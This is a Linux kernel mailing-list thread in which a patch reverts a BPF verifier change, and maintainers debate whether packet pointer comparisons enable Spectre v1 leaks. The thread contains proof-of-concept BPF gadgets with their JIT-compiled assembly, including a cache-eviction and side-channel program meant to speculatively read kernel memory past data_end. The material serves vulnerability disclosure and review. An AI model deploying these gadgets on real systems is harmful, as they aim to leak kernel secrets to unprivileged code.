diff mbox series

[2/3] Revert "bpf: Fix issue in verifying allow_ptr_leaks"

Message ID 20230913122827.91591-1-gerhorst@amazon.de (mailing list archive)
State New
Headers show
Series [1/3] Revert "selftests/bpf: Add selftest for allow_ptr_leaks" | expand

Commit Message

Luis Gerhorst Sept. 13, 2023, 12:28 p.m. UTC
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.

To mitigate Spectre v1, the verifier relies on static analysis to deduct
constant pointer bounds, which can then be enforced by rewriting pointer
arithmetic [1] or index masking [2]. This relies on the fact that every
memory region to be accessed has a static upper bound and every date
below that bound is accessible. The verifier can only rewrite pointer
arithmetic or insert masking instructions to mitigate Spectre v1 if a
static upper bound, below of which every access is valid, can be given.

When allowing packet pointer comparisons, this introduces a way for the
program to effectively construct an accessible pointer for which no
static upper bound is known. Intuitively, this is obvious as a packet
might be of any size and therefore 0 is the only statically known upper
bound below of which every date is always accessible (i.e., none).

To clarify, the problem is not that comparing two pointers can be used
for pointer leaks in the same way in that comparing a pointer to a known
scalar can be used for pointer leaks. That is because the "secret"
components of the addresses cancel each other out if the pointers are
into the same region.

With [3] applied, the following malicious BPF program can be loaded into
the kernel without CAP_PERFMON:

r2 = *(u32 *)(r1 + 76) // data
r3 = *(u32 *)(r1 + 80) // data_end
r4 = r2
r4 += 1
if r4 > r3 goto exit
r5 = *(u8 *)(r2 + 0) // speculatively read secret
r5 &= 1 // choose bit to leak
// ... side channel to leak secret bit
exit:
// ...

This is jited to the following amd64 code which still contains the
gadget:

   0:   endbr64
   4:   nopl   0x0(%rax,%rax,1)
   9:   xchg   %ax,%ax
   b:   push   %rbp
   c:   mov    %rsp,%rbp
   f:   endbr64
  13:   push   %rbx
  14:   mov    0xc8(%rdi),%rsi // data
  1b:   mov    0x50(%rdi),%rdx // data_end
  1f:   mov    %rsi,%rcx
  22:   add    $0x1,%rcx
  26:   cmp    %rdx,%rcx
  29:   ja     0x000000000000003f // branch to mispredict
  2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
  30:   and    $0x1,%r8 // choose bit to leak
  34:   xor    %ebx,%ebx
  36:   cmp    %rbx,%r8
  39:   je     0x000000000000003f // branch based on secret
  3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
  3f:   xor    %eax,%eax
  41:   pop    %rbx
  42:   leaveq
  43:   retq

Here I'm using a port contention side channel because storing the secret
to the stack causes the verifier to insert an lfence for unrelated
reasons (SSB mitigation) which would terminate the speculation.

As Daniel already pointed out to me, data_end is even attacker
controlled as one could send many packets of sufficient length to train
the branch prediction into assuming data_end >= data will never be true.
When the attacker then sends a packet with insufficient data, the
Spectre v1 gadget leaks the chosen bit of some value that lies behind
data_end.

To make it clear that the problem is not the pointer comparison but the
missing masking instruction, it can be useful to transform the code
above into the following equivalent pseudocode:

r2 = data
r3 = data_end
r6 = ... // index to access, constant does not help
r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
if !(r6 < r7) goto exit
// no masking of index in r6 happens
r2 += r6 // addr. to access
r5 = *(u8 *)(r2 + 0) // speculatively read secret
// ... leak secret as above

One idea to resolve this while still allowing for unprivileged packet
access would be to always allocate a power of 2 for the packet data and
then also pass the respective index mask in the skb structure. The
verifier would then have to check that this index mask is always applied
to the offset before a packet pointer is dereferenced. This patch does
not implement this extension, but only reverts [3].

[1] 979d63d50c0c0f7bc537bf821e056cc9fe5abd38 ("bpf: prevent out of bounds speculation on pointer arithmetic")
[2] b2157399cc9898260d6031c5bfe45fe137c1fbe7 ("bpf: prevent out-of-bounds speculation")
[3] d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2 ("bpf: Fix issue in verifying allow_ptr_leaks")

Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: Luis Gerhorst <gerhorst@amazon.de>
Signed-off-by: Luis Gerhorst <gerhorst@cs.fau.de>
Acked-by: Hagar Gamal Halim Hemdan <hagarhem@amazon.de>
Cc: Puranjay Mohan <puranjay12@gmail.com>
---
 kernel/bpf/verifier.c | 17 ++++++++---------
 1 file changed, 8 insertions(+), 9 deletions(-)

Comments

Alexei Starovoitov Sept. 14, 2023, 4:20 p.m. UTC | #1
On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst <gerhorst@amazon.de> wrote:
>
> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>
> To mitigate Spectre v1, the verifier relies on static analysis to deduct
> constant pointer bounds, which can then be enforced by rewriting pointer
> arithmetic [1] or index masking [2]. This relies on the fact that every
> memory region to be accessed has a static upper bound and every date
> below that bound is accessible. The verifier can only rewrite pointer
> arithmetic or insert masking instructions to mitigate Spectre v1 if a
> static upper bound, below of which every access is valid, can be given.
>
> When allowing packet pointer comparisons, this introduces a way for the
> program to effectively construct an accessible pointer for which no
> static upper bound is known. Intuitively, this is obvious as a packet
> might be of any size and therefore 0 is the only statically known upper
> bound below of which every date is always accessible (i.e., none).
>
> To clarify, the problem is not that comparing two pointers can be used
> for pointer leaks in the same way in that comparing a pointer to a known
> scalar can be used for pointer leaks. That is because the "secret"
> components of the addresses cancel each other out if the pointers are
> into the same region.
>
> With [3] applied, the following malicious BPF program can be loaded into
> the kernel without CAP_PERFMON:
>
> r2 = *(u32 *)(r1 + 76) // data
> r3 = *(u32 *)(r1 + 80) // data_end
> r4 = r2
> r4 += 1
> if r4 > r3 goto exit
> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> r5 &= 1 // choose bit to leak
> // ... side channel to leak secret bit
> exit:
> // ...
>
> This is jited to the following amd64 code which still contains the
> gadget:
>
>    0:   endbr64
>    4:   nopl   0x0(%rax,%rax,1)
>    9:   xchg   %ax,%ax
>    b:   push   %rbp
>    c:   mov    %rsp,%rbp
>    f:   endbr64
>   13:   push   %rbx
>   14:   mov    0xc8(%rdi),%rsi // data
>   1b:   mov    0x50(%rdi),%rdx // data_end
>   1f:   mov    %rsi,%rcx
>   22:   add    $0x1,%rcx
>   26:   cmp    %rdx,%rcx
>   29:   ja     0x000000000000003f // branch to mispredict
>   2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>   30:   and    $0x1,%r8 // choose bit to leak
>   34:   xor    %ebx,%ebx
>   36:   cmp    %rbx,%r8
>   39:   je     0x000000000000003f // branch based on secret
>   3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>   3f:   xor    %eax,%eax
>   41:   pop    %rbx
>   42:   leaveq
>   43:   retq
>
> Here I'm using a port contention side channel because storing the secret
> to the stack causes the verifier to insert an lfence for unrelated
> reasons (SSB mitigation) which would terminate the speculation.
>
> As Daniel already pointed out to me, data_end is even attacker
> controlled as one could send many packets of sufficient length to train
> the branch prediction into assuming data_end >= data will never be true.
> When the attacker then sends a packet with insufficient data, the
> Spectre v1 gadget leaks the chosen bit of some value that lies behind
> data_end.

The above analysis is correct, but unlike traditional spec_v1
the attacker doesn't control data/data_end.
The attack can send many large packets to train that data + X < data_end
and then send a small packet where CPU will mispredict that branch
and data + X will speculatively read past data_end,
so the attacker can extract a bit past data_end,
but data/data_end themselves cannot be controlled.
So whether this bit 0 or 1 has no bearing.
The attack cannot be repeated for the same location.
The attacker can read one bit 8 times in a row and all of them
will be from different locations in the memory.
Same as reading 8 random bits from 8 random locations.
Hence I don't think this revert is necessary.
I don't believe you can craft an actual exploit.

Your patch 3 says:
       /* Speculative access to be prevented. */
+       char secret = *((char *) iph);
+
+       /* Leak the first bit of the secret value that lies behind data_end to a
+        * SMP silbling thread that also executes imul instructions. If the bit
+        * is 1, the silbling will experience a slowdown. */
+       long long x = secret;
+       if (secret & 1) {
+               x *= 97;
+       }

the comment is correct, but speculative access alone is not enough
to leak data.
Daniel Borkmann Sept. 14, 2023, 5:24 p.m. UTC | #2
On 9/14/23 6:20 PM, Alexei Starovoitov wrote:
> On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst <gerhorst@amazon.de> wrote:
>>
>> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>>
>> To mitigate Spectre v1, the verifier relies on static analysis to deduct
>> constant pointer bounds, which can then be enforced by rewriting pointer
>> arithmetic [1] or index masking [2]. This relies on the fact that every
>> memory region to be accessed has a static upper bound and every date
>> below that bound is accessible. The verifier can only rewrite pointer
>> arithmetic or insert masking instructions to mitigate Spectre v1 if a
>> static upper bound, below of which every access is valid, can be given.
>>
>> When allowing packet pointer comparisons, this introduces a way for the
>> program to effectively construct an accessible pointer for which no
>> static upper bound is known. Intuitively, this is obvious as a packet
>> might be of any size and therefore 0 is the only statically known upper
>> bound below of which every date is always accessible (i.e., none).
>>
>> To clarify, the problem is not that comparing two pointers can be used
>> for pointer leaks in the same way in that comparing a pointer to a known
>> scalar can be used for pointer leaks. That is because the "secret"
>> components of the addresses cancel each other out if the pointers are
>> into the same region.
>>
>> With [3] applied, the following malicious BPF program can be loaded into
>> the kernel without CAP_PERFMON:
>>
>> r2 = *(u32 *)(r1 + 76) // data
>> r3 = *(u32 *)(r1 + 80) // data_end
>> r4 = r2
>> r4 += 1
>> if r4 > r3 goto exit
>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>> r5 &= 1 // choose bit to leak
>> // ... side channel to leak secret bit
>> exit:
>> // ...
>>
>> This is jited to the following amd64 code which still contains the
>> gadget:
>>
>>     0:   endbr64
>>     4:   nopl   0x0(%rax,%rax,1)
>>     9:   xchg   %ax,%ax
>>     b:   push   %rbp
>>     c:   mov    %rsp,%rbp
>>     f:   endbr64
>>    13:   push   %rbx
>>    14:   mov    0xc8(%rdi),%rsi // data
>>    1b:   mov    0x50(%rdi),%rdx // data_end
>>    1f:   mov    %rsi,%rcx
>>    22:   add    $0x1,%rcx
>>    26:   cmp    %rdx,%rcx
>>    29:   ja     0x000000000000003f // branch to mispredict
>>    2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>>    30:   and    $0x1,%r8 // choose bit to leak
>>    34:   xor    %ebx,%ebx
>>    36:   cmp    %rbx,%r8
>>    39:   je     0x000000000000003f // branch based on secret
>>    3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>>    3f:   xor    %eax,%eax
>>    41:   pop    %rbx
>>    42:   leaveq
>>    43:   retq
>>
>> Here I'm using a port contention side channel because storing the secret
>> to the stack causes the verifier to insert an lfence for unrelated
>> reasons (SSB mitigation) which would terminate the speculation.
>>
>> As Daniel already pointed out to me, data_end is even attacker
>> controlled as one could send many packets of sufficient length to train
>> the branch prediction into assuming data_end >= data will never be true.
>> When the attacker then sends a packet with insufficient data, the
>> Spectre v1 gadget leaks the chosen bit of some value that lies behind
>> data_end.
> 
> The above analysis is correct, but unlike traditional spec_v1
> the attacker doesn't control data/data_end.
> The attack can send many large packets to train that data + X < data_end
> and then send a small packet where CPU will mispredict that branch
> and data + X will speculatively read past data_end,
> so the attacker can extract a bit past data_end,
> but data/data_end themselves cannot be controlled.
> So whether this bit 0 or 1 has no bearing.
> The attack cannot be repeated for the same location.
> The attacker can read one bit 8 times in a row and all of them
> will be from different locations in the memory.
> Same as reading 8 random bits from 8 random locations.
> Hence I don't think this revert is necessary.
> I don't believe you can craft an actual exploit.
> 
> Your patch 3 says:
>         /* Speculative access to be prevented. */
> +       char secret = *((char *) iph);
> +
> +       /* Leak the first bit of the secret value that lies behind data_end to a
> +        * SMP silbling thread that also executes imul instructions. If the bit
> +        * is 1, the silbling will experience a slowdown. */
> +       long long x = secret;
> +       if (secret & 1) {
> +               x *= 97;
> +       }
> 
> the comment is correct, but speculative access alone is not enough
> to leak data.

What you write makes sense, it will probably be hard to craft an exploit.
Where it's a bit more of an unknown to me is whether struct skb_shared_info
could have e.g. destructor_arg rather static (at last the upper addr bits)
so that you would leak out kernel addresses.
Alexei Starovoitov Sept. 14, 2023, 7:47 p.m. UTC | #3
On Thu, Sep 14, 2023 at 10:24 AM Daniel Borkmann <daniel@iogearbox.net> wrote:
>
> On 9/14/23 6:20 PM, Alexei Starovoitov wrote:
> > On Wed, Sep 13, 2023 at 5:30 AM Luis Gerhorst <gerhorst@amazon.de> wrote:
> >>
> >> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
> >>
> >> To mitigate Spectre v1, the verifier relies on static analysis to deduct
> >> constant pointer bounds, which can then be enforced by rewriting pointer
> >> arithmetic [1] or index masking [2]. This relies on the fact that every
> >> memory region to be accessed has a static upper bound and every date
> >> below that bound is accessible. The verifier can only rewrite pointer
> >> arithmetic or insert masking instructions to mitigate Spectre v1 if a
> >> static upper bound, below of which every access is valid, can be given.
> >>
> >> When allowing packet pointer comparisons, this introduces a way for the
> >> program to effectively construct an accessible pointer for which no
> >> static upper bound is known. Intuitively, this is obvious as a packet
> >> might be of any size and therefore 0 is the only statically known upper
> >> bound below of which every date is always accessible (i.e., none).
> >>
> >> To clarify, the problem is not that comparing two pointers can be used
> >> for pointer leaks in the same way in that comparing a pointer to a known
> >> scalar can be used for pointer leaks. That is because the "secret"
> >> components of the addresses cancel each other out if the pointers are
> >> into the same region.
> >>
> >> With [3] applied, the following malicious BPF program can be loaded into
> >> the kernel without CAP_PERFMON:
> >>
> >> r2 = *(u32 *)(r1 + 76) // data
> >> r3 = *(u32 *)(r1 + 80) // data_end
> >> r4 = r2
> >> r4 += 1
> >> if r4 > r3 goto exit
> >> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> >> r5 &= 1 // choose bit to leak
> >> // ... side channel to leak secret bit
> >> exit:
> >> // ...
> >>
> >> This is jited to the following amd64 code which still contains the
> >> gadget:
> >>
> >>     0:   endbr64
> >>     4:   nopl   0x0(%rax,%rax,1)
> >>     9:   xchg   %ax,%ax
> >>     b:   push   %rbp
> >>     c:   mov    %rsp,%rbp
> >>     f:   endbr64
> >>    13:   push   %rbx
> >>    14:   mov    0xc8(%rdi),%rsi // data
> >>    1b:   mov    0x50(%rdi),%rdx // data_end
> >>    1f:   mov    %rsi,%rcx
> >>    22:   add    $0x1,%rcx
> >>    26:   cmp    %rdx,%rcx
> >>    29:   ja     0x000000000000003f // branch to mispredict
> >>    2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
> >>    30:   and    $0x1,%r8 // choose bit to leak
> >>    34:   xor    %ebx,%ebx
> >>    36:   cmp    %rbx,%r8
> >>    39:   je     0x000000000000003f // branch based on secret
> >>    3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
> >>    3f:   xor    %eax,%eax
> >>    41:   pop    %rbx
> >>    42:   leaveq
> >>    43:   retq
> >>
> >> Here I'm using a port contention side channel because storing the secret
> >> to the stack causes the verifier to insert an lfence for unrelated
> >> reasons (SSB mitigation) which would terminate the speculation.
> >>
> >> As Daniel already pointed out to me, data_end is even attacker
> >> controlled as one could send many packets of sufficient length to train
> >> the branch prediction into assuming data_end >= data will never be true.
> >> When the attacker then sends a packet with insufficient data, the
> >> Spectre v1 gadget leaks the chosen bit of some value that lies behind
> >> data_end.
> >
> > The above analysis is correct, but unlike traditional spec_v1
> > the attacker doesn't control data/data_end.
> > The attack can send many large packets to train that data + X < data_end
> > and then send a small packet where CPU will mispredict that branch
> > and data + X will speculatively read past data_end,
> > so the attacker can extract a bit past data_end,
> > but data/data_end themselves cannot be controlled.
> > So whether this bit 0 or 1 has no bearing.
> > The attack cannot be repeated for the same location.
> > The attacker can read one bit 8 times in a row and all of them
> > will be from different locations in the memory.
> > Same as reading 8 random bits from 8 random locations.
> > Hence I don't think this revert is necessary.
> > I don't believe you can craft an actual exploit.
> >
> > Your patch 3 says:
> >         /* Speculative access to be prevented. */
> > +       char secret = *((char *) iph);
> > +
> > +       /* Leak the first bit of the secret value that lies behind data_end to a
> > +        * SMP silbling thread that also executes imul instructions. If the bit
> > +        * is 1, the silbling will experience a slowdown. */
> > +       long long x = secret;
> > +       if (secret & 1) {
> > +               x *= 97;
> > +       }
> >
> > the comment is correct, but speculative access alone is not enough
> > to leak data.
>
> What you write makes sense, it will probably be hard to craft an exploit.
> Where it's a bit more of an unknown to me is whether struct skb_shared_info
> could have e.g. destructor_arg rather static (at last the upper addr bits)
> so that you would leak out kernel addresses.

You mean since skb_shared_info is placed after skb->end
and in zero copy case destructor_arg may be initialized with the same
kernel pointer for multiple skb-s ?
The attacker cannot construct the address from data_end.
The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END.
But the attacker can do skb->data + X.
The idea is that they can train the branch to mispredict with
a large packet and then send a small one so that shared_info
after skb->end has the same uarg pointer in all packets?
So every skb->data+X is a different location, but all of them
point to data that has uarg==destructor_arg ?

That would be feasible in theory, but in order to speculate the loads
the branch mispredict has to be reliable.
The spec v1 attack requires one of two loads feeding
into compare operation has to be slow.
In this case both data and data_end loads are going to be fast.
The attacker cannot evict skb->data or skb->data_end from cache.
Remember that we rearranged 'max_entries' field in struct bpf_map
specifically to be in the different cache line vs fields
controlled by user space. It was the necessary part of spec v1 attack.

So I still believe this revert is unnecessary and this speculative
execution is not exploitable.
Yafang Shao Sept. 15, 2023, 2:26 a.m. UTC | #4
On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst <gerhorst@amazon.de> wrote:
>
> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>
> To mitigate Spectre v1, the verifier relies on static analysis to deduct
> constant pointer bounds, which can then be enforced by rewriting pointer
> arithmetic [1] or index masking [2]. This relies on the fact that every
> memory region to be accessed has a static upper bound and every date
> below that bound is accessible. The verifier can only rewrite pointer
> arithmetic or insert masking instructions to mitigate Spectre v1 if a
> static upper bound, below of which every access is valid, can be given.
>
> When allowing packet pointer comparisons, this introduces a way for the
> program to effectively construct an accessible pointer for which no
> static upper bound is known. Intuitively, this is obvious as a packet
> might be of any size and therefore 0 is the only statically known upper
> bound below of which every date is always accessible (i.e., none).
>
> To clarify, the problem is not that comparing two pointers can be used
> for pointer leaks in the same way in that comparing a pointer to a known
> scalar can be used for pointer leaks. That is because the "secret"
> components of the addresses cancel each other out if the pointers are
> into the same region.
>
> With [3] applied, the following malicious BPF program can be loaded into
> the kernel without CAP_PERFMON:
>
> r2 = *(u32 *)(r1 + 76) // data
> r3 = *(u32 *)(r1 + 80) // data_end
> r4 = r2
> r4 += 1
> if r4 > r3 goto exit
> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> r5 &= 1 // choose bit to leak
> // ... side channel to leak secret bit
> exit:
> // ...
>
> This is jited to the following amd64 code which still contains the
> gadget:
>
>    0:   endbr64
>    4:   nopl   0x0(%rax,%rax,1)
>    9:   xchg   %ax,%ax
>    b:   push   %rbp
>    c:   mov    %rsp,%rbp
>    f:   endbr64
>   13:   push   %rbx
>   14:   mov    0xc8(%rdi),%rsi // data
>   1b:   mov    0x50(%rdi),%rdx // data_end
>   1f:   mov    %rsi,%rcx
>   22:   add    $0x1,%rcx
>   26:   cmp    %rdx,%rcx
>   29:   ja     0x000000000000003f // branch to mispredict
>   2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>   30:   and    $0x1,%r8 // choose bit to leak
>   34:   xor    %ebx,%ebx
>   36:   cmp    %rbx,%r8
>   39:   je     0x000000000000003f // branch based on secret
>   3b:   imul   $0x61,%r8,%r8 // leak using port contention side channel
>   3f:   xor    %eax,%eax
>   41:   pop    %rbx
>   42:   leaveq
>   43:   retq
>
> Here I'm using a port contention side channel because storing the secret
> to the stack causes the verifier to insert an lfence for unrelated
> reasons (SSB mitigation) which would terminate the speculation.
>
> As Daniel already pointed out to me, data_end is even attacker
> controlled as one could send many packets of sufficient length to train
> the branch prediction into assuming data_end >= data will never be true.
> When the attacker then sends a packet with insufficient data, the
> Spectre v1 gadget leaks the chosen bit of some value that lies behind
> data_end.
>
> To make it clear that the problem is not the pointer comparison but the
> missing masking instruction, it can be useful to transform the code
> above into the following equivalent pseudocode:
>
> r2 = data
> r3 = data_end
> r6 = ... // index to access, constant does not help
> r7 = data_end - data // only known at runtime, could be [0,PKT_MAX)
> if !(r6 < r7) goto exit
> // no masking of index in r6 happens
> r2 += r6 // addr. to access
> r5 = *(u8 *)(r2 + 0) // speculatively read secret
> // ... leak secret as above
>
> One idea to resolve this while still allowing for unprivileged packet
> access would be to always allocate a power of 2 for the packet data and
> then also pass the respective index mask in the skb structure. The
> verifier would then have to check that this index mask is always applied
> to the offset before a packet pointer is dereferenced. This patch does
> not implement this extension, but only reverts [3].

Hi Luis,

The skb pointer comparison is a reasonable operation in a networking bpf prog.
If we just prohibit a reasonable operation to prevent a possible
spectre v1 attack, it looks a little weird, right ?
Should we figure out a real fix to prevent it ?
Luis Gerhorst Sept. 18, 2023, 11:25 a.m. UTC | #5
On Thu, 14 Sep 2023 12:47:16 -0700, Alexei Starovoitov wrote:
> You mean since skb_shared_info is placed after skb->end
> and in zero copy case destructor_arg may be initialized with the same
> kernel pointer for multiple skb-s ?
> The attacker cannot construct the address from data_end.
> The verifier explicitly prohibits any ALU with PTR_TO_PACKET_END.
> But the attacker can do skb->data + X.
> The idea is that they can train the branch to mispredict with
> a large packet and then send a small one so that shared_info
> after skb->end has the same uarg pointer in all packets?
> So every skb->data+X is a different location, but all of them
> point to data that has uarg==destructor_arg ?
>
> That would be feasible in theory, but in order to speculate the loads
> the branch mispredict has to be reliable.
> The spec v1 attack requires one of two loads feeding
> into compare operation has to be slow.
> In this case both data and data_end loads are going to be fast.
> The attacker cannot evict skb->data or skb->data_end from cache.

It is true that this is not easily possible using the method most exploits use,
at least to my knowledge (i.e., accessing the same address from another core).
However, it is still possible to evict the cacheline with skb->data/data_end
from the cache in between the loads by iterating over a large map using
bpf_loop(). Then the load of skb->data_end would be slow while skb->data is
readily available in a callee-saved register.

For a CPU with 64KiB of per-core L1 cache all 64-byte cachelines can be evicted
by iterating over a 64KiB array using 64-byte increments, that's only 1k
iterations. Meanwhile, skb->data can be safe in r15 as this is not used by
bpf_loop() and bpf_map_lookup_elem(). Even evicting the L2 cache might be
possible as bpf_loop() currently has a iteration limit of 8 million. To extend
that, userspace could work on evicting the L3 cache from other cores and make
the speculation window even larger. This would of course slow the whole reading
process down, but in return you can also leak more data by indexing into the
leak-array using a full byte.

For reference, here's the full program and assembly it is jited to:

static long callback_fn(__u32 index, void *ctx) {
	__u32 key = index * 8;
	__u64 *value = bpf_map_lookup_elem(&evictmap, &key);
	if (value) {
		*value = 2 * *value;
		return 0;
	}
	return 1;
}

SEC("tcx/ingress")
__naked void pkt_ptr(void)
{
	// +76: data
	// +80: data_end
	asm volatile (" \
r6 = 0; \
r7 = r1; \
prepare_data_%=: \
r8 = *(u32 *)(r1 + 76); \
r9 = r8; \
r9 += 34; \
evict_loop_%=: \
w1 = 1024;		\
r2 = %[callback_fn] ll; \
r3 = 0; \
*(u64 *)(r10 - 8) = r3; \
r3 = r10; \
r3 += -8; \
r4 = 0; \
call %[bpf_loop]; \
gadget_%=: \
r2 = *(u32 *)(r7 + 80);	  \
if r2 <= r9 goto exit_%=; \
r5 = *(u8 *)(r7 + 14); \
*(u64*)(r10 - 8) = r5; \
r2 = r10; \
r2 += -8; \
r1 = %[leakmap] ll; \
call %[bpf_map_lookup_elem]; \
if r0 == 0 goto exit_%=; \
r6 = *(u64 *)(r0 + 0); \
exit_%=: r0 = r6; \
exit; \
"	:
    : __imm_addr(leakmap),
	  __imm_addr(callback_fn),
	  __imm(bpf_loop),
	  __imm(bpf_map_lookup_elem)
	: __clobber_all);
}

bpf_prog_64fe264baec539aa_pkt_ptr:
; asm volatile (" \
   0:   endbr64
   4:   nopl   0x0(%rax,%rax,1)
   9:   xchg   %ax,%ax
   b:   push   %rbp
   c:   mov    %rsp,%rbp
   f:   endbr64
  13:   sub    $0x20,%rsp
  1a:   push   %rbx
  1b:   push   %r13
  1d:   push   %r14
  1f:   push   %r15
  21:   xor    %ebx,%ebx
  23:   mov    %rdi,%r13
  26:   mov    0xc8(%rdi),%r14
  2d:   mov    %r14,%r15
  30:   add    $0x22,%r15 // data prepared
  34:   mov    $0x2000,%edi
  39:   movabs $0xffffffffc01d09b0,%rsi
  43:   xor    %edx,%edx
  45:   mov    %rdx,-0x8(%rbp)
  49:   lfence
  4c:   mov    %rbp,%rdx
  4f:   add    $0xfffffffffffffff8,%rdx
  53:   xor    %ecx,%ecx
  55:   cmp    $0x800000,%rdi
  5c:   jbe    0x0000000000000065
  5e:   mov    $0xfffffff9,%eax
  63:   jmp    0x00000000000000a2
  65:   mov    %rbx,-0x20(%rbp)
  69:   mov    %r13,-0x18(%rbp)
  6d:   mov    %r14,-0x10(%rbp)
  71:   mov    %rdi,%rbx
  74:   xor    %r13d,%r13d
  77:   mov    %rdx,%r14
  7a:   cmp    %rbx,%r13
  7d:   jae    0x0000000000000093
  7f:   mov    %r13,%rdi
  82:   mov    %r14,%rsi
  85:   callq  0x0000000000000148
  8a:   add    $0x1,%r13
  8e:   test   %rax,%rax
  91:   je     0x000000000000007a
  93:   mov    %r13,%rax
  96:   mov    -0x20(%rbp),%rbx
  9a:   mov    -0x18(%rbp),%r13
  9e:   mov    -0x10(%rbp),%r14
  a2:   mov    0x50(%r13),%rsi // load data_end
  a6:   cmp    %r15,%rsi // use of data_end and data
  a9:   jbe    0x00000000000000f7 // to mispredict
  ab:   movzwq 0x7c(%r13),%r8 // use of data
  b0:   shr    $0x10,%r8d
  b4:   and    $0xff,%r8d
  bb:   mov    %r8,-0x8(%rbp)
  bf:   mov    %rbp,%rsi
  c2:   add    $0xfffffffffffffff8,%rsi
  c6:   movabs $0xffffb85680acd000,%rdi
  d0:   add    $0x210,%rdi
  d7:   mov    0x0(%rsi),%eax
  da:   cmp    $0x20000,%rax
  e1:   jae    0x00000000000000ec
  e3:   shl    $0x3,%rax
  e7:   add    %rdi,%rax
  ea:   jmp    0x00000000000000ee
  ec:   xor    %eax,%eax
  ee:   test   %rax,%rax
  f1:   je     0x00000000000000f7
  f3:   mov    0x0(%rax),%rbx
  f7:   mov    %rbx,%rax
  fa:   pop    %r15
  fc:   pop    %r14
  fe:   pop    %r13
 100:   pop    %rbx
 101:   leaveq
 102:   retq

long callback_fn(__u32 index, void * ctx):
bpf_prog_8e1ec5bf965fdd4a_callback_fn:
; __u32 key = index * 8;
   0:   endbr64
   4:   nopl   0x0(%rax,%rax,1)
   9:   xchg   %ax,%ax
   b:   push   %rbp
   c:   mov    %rsp,%rbp
   f:   endbr64
  13:   sub    $0x8,%rsp
  1a:   shl    $0x3,%edi
; __u32 key = index * 8;
  1d:   mov    %edi,-0x4(%rbp)
  20:   lfence
  23:   mov    %rbp,%rsi
;
  26:   add    $0xfffffffffffffffc,%rsi
; __u64 *value = bpf_map_lookup_elem(&evictmap, &key);
  2a:   movabs $0xffffb85680a01000,%rdi
  34:   add    $0x210,%rdi
  3b:   mov    0x0(%rsi),%eax
  3e:   cmp    $0x1000,%rax
  45:   jae    0x0000000000000050
  47:   shl    $0x3,%rax
  4b:   add    %rdi,%rax
  4e:   jmp    0x0000000000000052
  50:   xor    %eax,%eax
  52:   mov    $0x1,%edi
; if (value) {
  57:   test   %rax,%rax
  5a:   je     0x0000000000000069
; *value = 2 * *value;
  5c:   mov    0x0(%rax),%rdi
; *value = 2 * *value;
  60:   shl    %rdi
; *value = 2 * *value;
  63:   mov    %rdi,0x0(%rax)
  67:   xor    %edi,%edi
; }
  69:   mov    %rdi,%rax
  6c:   leaveq
  6d:   retq

> Remember that we rearranged 'max_entries' field in struct bpf_map
> specifically to be in the different cache line vs fields
> controlled by user space. It was the necessary part of spec v1 attack.
Luis Gerhorst Sept. 18, 2023, 11:52 a.m. UTC | #6
On 15/09/2023 04:26, Yafang Shao wrote:
> On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst <gerhorst@amazon.de> wrote:
>>
>> This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
>>
>> To mitigate Spectre v1, the verifier relies on static analysis to deduct
>> constant pointer bounds, which can then be enforced by rewriting pointer
>> arithmetic [1] or index masking [2]. This relies on the fact that every
>> memory region to be accessed has a static upper bound and every date
>> below that bound is accessible. The verifier can only rewrite pointer
>> arithmetic or insert masking instructions to mitigate Spectre v1 if a
>> static upper bound, below of which every access is valid, can be given.
>>
>> When allowing packet pointer comparisons, this introduces a way for the
>> program to effectively construct an accessible pointer for which no
>> static upper bound is known. Intuitively, this is obvious as a packet
>> might be of any size and therefore 0 is the only statically known upper
>> bound below of which every date is always accessible (i.e., none).
>>
>> To clarify, the problem is not that comparing two pointers can be used
>> for pointer leaks in the same way in that comparing a pointer to a known
>> scalar can be used for pointer leaks. That is because the "secret"
>> components of the addresses cancel each other out if the pointers are
>> into the same region.
>>
>> With [3] applied, the following malicious BPF program can be loaded into
>> the kernel without CAP_PERFMON:
>>
>> r2 = *(u32 *)(r1 + 76) // data
>> r3 = *(u32 *)(r1 + 80) // data_end
>> r4 = r2
>> r4 += 1
>> if r4 > r3 goto exit
>> r5 = *(u8 *)(r2 + 0) // speculatively read secret
>> r5 &= 1 // choose bit to leak
>> // ... side channel to leak secret bit
>> exit:
>> // ...
>>
>> This is jited to the following amd64 code which still contains the
>> gadget:
>>
>>     0:   endbr64
>>     4:   nopl   0x0(%rax,%rax,1)
>>     9:   xchg   %ax,%ax
>>     b:   push   %rbp
>>     c:   mov    %rsp,%rbp
>>     f:   endbr64
>>    13:   push   %rbx
>>    14:   mov    0xc8(%rdi),%rsi // data
>>    1b:   mov    0x50(%rdi),%rdx // data_end
>>    1f:   mov    %rsi,%rcx
>>    22:   add    $0x1,%rcx
>>    26:   cmp    %rdx,%rcx
>>    29:   ja     0x000000000000003f // branch to mispredict
>>    2b:   movzbq 0x0(%rsi),%r8 // speculative load of secret
>>    30:   and    $0x1,%r8 // choose bit to leak
>>    34:   xor    %ebx,%ebx
>>    36:   cmp    %rbx,%r8
>>    39:   je     0x000000000000003f // branch based on secret
